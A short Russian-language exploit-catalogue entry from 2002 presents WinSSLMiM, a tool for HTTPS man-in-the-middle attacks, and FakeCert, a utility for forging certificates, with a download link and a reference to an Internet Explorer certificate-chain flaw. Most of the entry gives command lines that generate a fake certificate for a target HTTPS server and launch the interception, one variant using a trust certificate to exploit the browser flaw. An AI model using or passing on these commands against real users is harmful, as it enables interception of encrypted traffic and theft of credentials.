Эксплоит WinSSLMiM

Свойства

Дата публикации:
05.12.2002
URL адреса:
http://www.securiteinfo.com/download/wsm.zip

Код

WinSSLMiM – эксплоит, реализующий нападение HTTPS “Man in the Middle”. Программа содержит FakeCert, утилиту для создания поддельных сертификатов (как DCA of sslmim). Код может, например, эксплуатировать уязвимость  Certificate Chain  в Internet Explorer  (http://www.securitylab.ru/?ID=32764). Работает только под Windows 9x/2000. Пример использования:
 
 FakeCert : fc -h
WinSSLMiM : wsm -h
 
Example 1:
Generate fake certificate: fc -s www.serverHTTPS.com -f fake_cert.crt
Launch WinSSLMiM: wsm -f fake_cert.crt

Example 2 (IE vulnerability):
Generate fake certificate : fc -s www.serverHTTPS.com -f fake_cert.crt -t 
trust.crt
Launch WinSSLMiM: wsm -f fake_cert.crt -t trust.crt

или введите имя

CAPTCHA